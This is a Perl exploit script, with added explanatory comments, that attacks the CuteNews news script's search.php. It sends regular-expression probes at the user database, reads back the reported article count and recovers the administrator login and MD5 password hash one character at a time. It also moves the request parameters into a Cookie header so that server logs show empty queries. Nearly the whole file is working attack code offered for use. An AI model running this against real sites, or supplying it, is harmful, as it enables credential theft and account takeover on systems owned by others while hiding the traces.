#!/usr/bin/perl
# Driver script: recovers an account name and its 32-character hex hash from a
# CuteNews search.php endpoint by sending one regular expression per request
# and reading back the article count that the page reports (see
# parse_response).  The count is the only feedback used; nothing else in the
# response body is parsed.
# NOTE(review): usage() runs before `use strict` is in effect, so this first
# statement is compiled without strictures.
&usage unless $ARGV[0];
use strict;
use LWP;
use utf8;
use Encode qw( decode );
$| = 1;    # unbuffer STDOUT so the final "login:hash" line is flushed promptly
# main
# URI->new is used without an explicit `use URI`; it appears to rely on LWP
# loading URI transitively -- TODO confirm before relying on it.
my $search_page_url = URI->new($ARGV[0]);
my $user_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36'; # common user agent string
my ($login, $md5hash);    # both must be set before the output section below
# Base query parameters shared by every probe; login()/password() clone this
# URI and append their own parameters.
$search_page_url->query_form([ 'dosearch' => 'yes',
                               'user'     => '1',
                             ]
                           );
# try the 'admin' login
print STDERR "[Getting login]\n";
{
    print STDERR "Checking if there exists account named 'admin'... ";
    # login() returns the reported article count, so a non-zero count is
    # taken as "an account matching the regex exists".
    if (&login('^admin$')){
        $login = 'admin';
        print STDERR 'yes!';
    } else {
        print STDERR 'no.';
    };
    print STDERR "\n";
}
# bruteforce [a-zA-Z0-9] login if not 'admin'
unless ($login){
    print STDERR 'Finding login... ';
    my $tmp = '';
    # check if login length is in 1-64
    die "\n", 'Can\'t find suitable account.' unless &login('^[a-zA-Z0-9]{1,64}$');
    # Extend $tmp one character at a time until the fully anchored regex
    # "^<tmp>$" matches, i.e. until the whole name has been recovered.
    until( &login("\^${tmp}\$")) {
        $tmp .= &binary_search($tmp, 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789', \&login);
        print STDERR "\rFinding login... $tmp";
    }
    print STDERR "\n";
    $login = $tmp;
}
die '...' unless $login;
# bruteforce md5 hash
print STDERR "\n[Getting password hash]\n";
{
    my $tmp = '';
    # The hash is assumed to be exactly 32 lowercase hex characters; the loop
    # runs until that length is reached, with no separate "done" check.
    while( length($tmp) != 32) {
        $tmp .= &binary_search($tmp, 'abcdef0123456789', \&password);
        print STDERR "\r$tmp";
    }
    print STDERR "\n";
    $md5hash = $tmp;
}
die "..." unless $md5hash;
print STDERR "\n[Output]\n";
print "$login:$md5hash\n";
exit;
- # can be upgraded to turn strings like abcdef into [a-f]
# can be upgraded to turn strings like abcdef into [a-f]
#
# Narrow $symbols down to a single character by repeated halving.  Each round
# asks the callback $req whether the regex "^<part>[<first half>]" matches
# (a truthy return keeps the first half, otherwise the second half is kept).
# Returns the one remaining character.  STDERR shows the current midpoint
# character and overwrites it with "\b" on every round as a progress display.
#
#   $part    - prefix already recovered, interpolated verbatim into the regex
#   $symbols - candidate alphabet as a plain string
#   $req     - code ref taking one regex string; here \&login or \&password
sub binary_search{
    my ($part, $symbols, $req) = @_;
    print STDERR substr($symbols, int(length($symbols)/2), 1);
    while (length($symbols) != 1){
        my $tmp = substr($symbols, 0, int(length($symbols)/2));
        # $tmp is dropped into a character class unescaped; the alphabets
        # passed in above contain only alphanumerics, so no escaping is needed.
        if ($req->("^${part}[$tmp]")){
            $symbols = $tmp;
        } else {
            $symbols = substr($symbols, int(length($symbols)/2));
        }
        print STDERR "\b", substr($symbols, int(length($symbols)/2), 1);
    }
    return $symbols;
}
# Probe the hash field.  Clones the base search URI, appends the already
# recovered $login as 'title' and the caller's regex (anchored to a 32-char
# [a-z0-9] value via a lookahead) as 'story', then returns the article count
# parsed from the response.  Uses the file-scoped $search_page_url and $login.
sub password{ # apply regex from $_[0] to $login's md5-hash and parse response
    my $url = $search_page_url->clone;
    # ($url->query_form, ...) re-lists the existing parameters so that the
    # new pairs are appended rather than replacing them.
    $url->query_form( ($url->query_form,
                       'files_arch[]' => 'data/users.db.php',
                       'title'        => $login,
                       'story'        => "(?=^[a-z0-9]{32}\$)$_[0]", # (?=..) to match only vs hash, not nickname. check app source code
                       #if(@preg_match("/$story/i", *nickname*) or @preg_match("/$story/i", *hash*)
                     )
                    );
    my $response = &do_REQ($url);
    return &parse_response($response);
}
# Probe the account-name field.  Same shape as password(), but the caller's
# regex goes into 'title' and no 'story' parameter is sent.  Returns the
# article count parsed from the response (see parse_response).
sub login{ # apply regex from $_[0] to login and parse response
    my $url = $search_page_url->clone;
    # Re-list the existing parameters so the new pairs are appended.
    $url->query_form( ($url->query_form,
                       'files_arch[]' => 'data/users.db.php',
                       'title'        => $_[0],
                     )
                    );
    my $response = &do_REQ($url);
    return &parse_response($response);
}
# Print the banner and usage text to STDERR and exit.  The banner is a single
# single-quoted literal (hence the escaped apostrophe inside the ASCII art);
# $0 is passed as a separate print argument because it would not interpolate.
sub usage{
    print STDERR ' _ _ _______ ______
___| \ | | ____\ \ / / ___|
/ __| \| | _| \ \ /\ / /\___ \
| (__| |\ | |___ \ V V / ___) |
\___|_| \_|_____| \_/\_/ |____/
___ ____ __
/ _ \___ \ / /_
| | | |__) | \'_ \
| |_| / __/| (_) |
\___/_____|\___/
This program exploits vulnerability in CuteNews php script and gives you administrator login and md5-hashed password.
Note: you can redirect stdout to file to get credentials in form login:hash. Stderr will be used for status updates.
Example of usage:
perl ', $0, ' http://rdot.org/cnews/search.php >creds.txt';
    exit;
}
# Extract the result count from a search page.  The body is decoded from
# cp1251 and matched against the Russian-language "Найдено <b>[N]</b> статей:"
# ("Found [N] articles:") marker; the number N is returned.  Dies if the
# marker is absent, so a page in another language or layout aborts the run.
#
#   $_[0] - raw response body as returned by do_REQ
sub parse_response{
    my $response = decode('cp1251', $_[0]);
    die "Can't parse response!" unless $response =~ m{Найдено <b>\[(\d+)\]</b> статей:};
    return $1;    # the captured count; 0 is falsy to the callers
}
# File-scoped LWP::UserAgent, created on first use inside do_REQ and reused
# for every subsequent request.
my $browser;
# Send one GET request and return its body.
#
# The query string of the given URL is moved into a Cookie header ("&"
# rewritten to "; ") and the URL's own query is cleared before sending.  From
# a server-log perspective every probe therefore arrives as a GET to the
# search page with an empty query string, while the 'dosearch', 'title',
# 'story' and 'files_arch[]' parameters travel in the Cookie header.
#
#   $_[0] - URI (or string) to request
# Returns the body in scalar context; in list context returns
# (content, status_line, is_success).  Dies on any non-success response.
sub do_REQ {
    unless ($browser){
        $browser = LWP::UserAgent->new(('agent' => $user_agent));
        $browser->timeout(30);
    }
    # since rg==on always, turn all GET params 2 COOKIE
    my $url = URI->new($_[0]);
    my $params = $url->query();
    $params =~ s/&/; /g;
    $url->query_form('');
    my $resp = $browser->get($url, ('Cookie' => $params));
    die "Failed making request" unless $resp->is_success;
    return ($resp->content, $resp->status_line, $resp->is_success)
        if wantarray;
    # Unreachable in practice: the die above already rejects non-success
    # responses, so this guard can never trigger.
    return unless $resp->is_success;
    return $resp->content;
}